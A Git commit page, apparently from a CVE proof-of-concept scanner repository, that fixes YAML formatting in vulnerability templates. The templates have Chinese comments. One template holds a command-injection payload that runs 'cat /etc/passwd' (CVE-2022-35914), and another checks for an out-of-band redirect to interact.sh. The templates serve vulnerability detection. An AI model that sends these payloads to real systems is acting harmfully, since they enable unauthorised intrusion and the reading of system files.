fixed poc file format error

StarCrossPortal · Nov 10, 2022 · 26cfb7b · 26cfb7b
1 parent 515ef00
commit 26cfb7b
Show file tree

Hide file tree

Showing 7 changed files with 24 additions and 229 deletions.
diff --git a/poc/cve/2019/CVE-2019-12962.yaml b/poc/cve/2019/CVE-2019-12962.yaml
@@ -53,7 +53,7 @@ mutate_rule:                          # 数组值，可以有多组，它们之
   - 
     pos: 3                            # 整数，只能取1，2，3其中一个，分别表示插入末尾，插入随机位置以及替换
     value: '/mobile/index.php'                        # 字符串，表示你想要的值
-    
+-
   mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
     header_all: true                      # 布尔值，表示是否对http的所有header进行变异。
     header_filter:                    # 数组值，可以通过参数名称或者参数值筛选你想要变异的http header，

diff --git a/poc/cve/2021/CVE-2021-29622.yaml b/poc/cve/2021/CVE-2021-29622.yaml
@@ -62,6 +62,6 @@ response_check:                       # 数组值，输出检查，用来检查p
     resp_headers:                       # 表示响应中的headers
       value: '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'                          # 需要检查的响应头中的值
       operator: 2                        # 比较规则，可以取值1，2;；分别代表操作是字符串包含，正则匹配
-     resp_body:                          # 表示响应中的body
+    resp_body:                          # 表示响应中的body
       value:                           # 需要检查的响应体中的值
       operator:                         # 比较规则，可以取值1，2；分别代表操作是字符串包含，正则匹配
diff --git a/poc/cve/2021/CVE-2021-41266.yaml b/poc/cve/2021/CVE-2021-41266.yaml
@@ -53,7 +53,7 @@ mutate_rule:                          # 数组值，可以有多组，它们之
   - 
     pos: 3                            # 整数，只能取1，2，3其中一个，分别表示插入末尾，插入随机位置以及替换
     value: "/api/v1/login/oauth2/auth"                        # 字符串，表示你想要的值
-    
+-
   mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
     header_all:                       # 布尔值，表示是否对http的所有header进行变异。
     header_filter:                    # 数组值，可以通过参数名称或者参数值筛选你想要变异的http header，
@@ -97,16 +97,16 @@ mutate_rule:                          # 数组值，可以有多组，它们之
   mutate_way:                         # 数组值，变异方式。表示对你选择的变异位置进行变异的方式，可以有多组，它们之间是And关系
   - 
     pos: 3                            # 整数，只能取1，2，3其中一个，分别表示插入末尾，插入随机位置以及替换
-    value: "{"code":"test","state":"test"}"                        # 字符串，表示你想要的值
+    value: '{"code":"test","state":"test"}'                        # 字符串，表示你想要的值
 
 response_check:                       # 数组值，输出检查，用来检查poc是否命中，多个组之间是OR关系
-  -                                     # 每组内的参数之间是AND关系
-    status_code:                        # 表示响应状态码
-      value: 202                           # 需要检查的状态码的值
-      operator: 4                        # 比较规则，可以取值1，2，3，4，5；分别代表操作是字符串包含，正则匹配，大于，小于以及等于
-    resp_headers:                       # 表示响应中的headers
-      value: "token"                           # 需要检查的响应头中的值
-      operator: 1                        # 比较规则，可以取值1，2;；分别代表操作是字符串包含，正则匹配
-    resp_body:                          # 表示响应中的body
-      value: "sessionId"                           # 需要检查的响应体中的值
-      operator: 1                        # 比较规则，可以取值1，2；分别代表操作是字符串包含，正则匹配
+-                                     # 每组内的参数之间是AND关系
+  status_code:                        # 表示响应状态码
+    value: 202                           # 需要检查的状态码的值
+    operator: 4                        # 比较规则，可以取值1，2，3，4，5；分别代表操作是字符串包含，正则匹配，大于，小于以及等于
+  resp_headers:                       # 表示响应中的headers
+    value: "token"                           # 需要检查的响应头中的值
+    operator: 1                        # 比较规则，可以取值1，2;；分别代表操作是字符串包含，正则匹配
+  resp_body:                          # 表示响应中的body
+    value: "sessionId"                           # 需要检查的响应体中的值
+    operator: 1                        # 比较规则，可以取值1，2；分别代表操作是字符串包含，正则匹配
diff --git a/poc/cve/2022/CVE-2022-34590.yaml b/poc/cve/2022/CVE-2022-34590.yaml
@@ -54,7 +54,7 @@ mutate_rule:                          # 数组值，可以有多组，它们之
     pos: 3                            # 整数，只能取1，2，3其中一个，分别表示插入末尾，插入随机位置以及替换
     value: /hms/admin/                        #字符串，表示你想要的值
 -     
-      mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
+  mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
     header_all:                       # 布尔值，表示是否对http的所有header进行变异。
     header_filter:                    # 数组值，可以通过参数名称或者参数值筛选你想要变异的http header，
     - 

diff --git a/poc/cve/2022/CVE-2022-35413.yaml b/poc/cve/2022/CVE-2022-35413.yaml
@@ -54,7 +54,7 @@ mutate_rule:                          # 数组值，可以有多组，它们之
     pos: 3                            # 整数，只能取1，2，3其中一个，分别表示插入末尾，插入随机位置以及替换
     value: /webapi/auth                        # 字符串，表示你想要的值
 -     
-    mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
+  mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
     header_all:                       # 布尔值，表示是否对http的所有header进行变异。
     header_filter:                    # 数组值，可以通过参数名称或者参数值筛选你想要变异的http header，
     - 
@@ -93,7 +93,7 @@ mutate_rule:                          # 数组值，可以有多组，它们之
       args:                           # 整数，只能取1或2，分别表示参数名称，参数值。
       operator:                       # 整数，只能取1或2，分别表示正则匹配，字符串相等
       value:                          # 字符串，你想筛选的值
-  
+
   mutate_way:                         # 数组值，变异方式。表示对你选择的变异位置进行变异的方式，可以有多组，它们之间是And关系
   - 
     pos: 3                            # 整数，只能取1，2，3其中一个，分别表示插入末尾，插入随机位置以及替换

diff --git a/poc/cve/2022/CVE-2022-35914.yaml b/poc/cve/2022/CVE-2022-35914.yaml
@@ -98,8 +98,8 @@ mutate_rule:                          # 数组值，可以有多组，它们之
   - 
     pos: 3                            # 整数，只能取1，2，3其中一个，分别表示插入末尾，插入随机位置以及替换
     value: 'sid=foo&hhook=exec&text=cat /etc/passwd'                        # 字符串，表示你想要的值
-
-    mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
+-    
+  mutate_position:                    # 变异位置，表示你选择哪些位置进行变异
     header_all: true                      # 布尔值，表示是否对http的所有header进行变异。
     header_filter:                    # 数组值，可以通过参数名称或者参数值筛选你想要变异的http header，
     -